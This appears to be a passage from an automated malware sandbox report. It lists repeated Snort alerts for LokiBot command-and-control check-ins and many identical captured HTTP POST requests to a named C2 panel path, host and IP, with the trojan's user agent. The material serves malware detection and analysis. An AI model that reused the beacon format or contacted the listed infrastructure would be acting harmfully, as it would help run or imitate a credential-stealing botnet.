Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49848 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49849 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49849 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49849 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49849 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49850 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49850 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49850 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49850 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49851 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49851 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49851 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49851 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49852 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49852 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49852 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49852 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49853 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49853 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49853 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49853 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49854 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49854 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49854 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49854 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49855 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49855 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49855 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49855 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49856 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49856 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49856 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49856 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49857 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49857 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49857 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49857 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49858 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49858 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49858 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49858 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49859 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49859 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49859 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49859 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49860 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49860 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49860 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49860 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49861 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49861 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49861 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49861 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49862 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49862 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49862 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49862 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49863 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49863 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49863 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49863 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49864 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49864 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49864 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49864 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49865 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49865 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49865 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49865 -> 72.55.186.14:80
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: unknown unknown
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 176Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 176Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
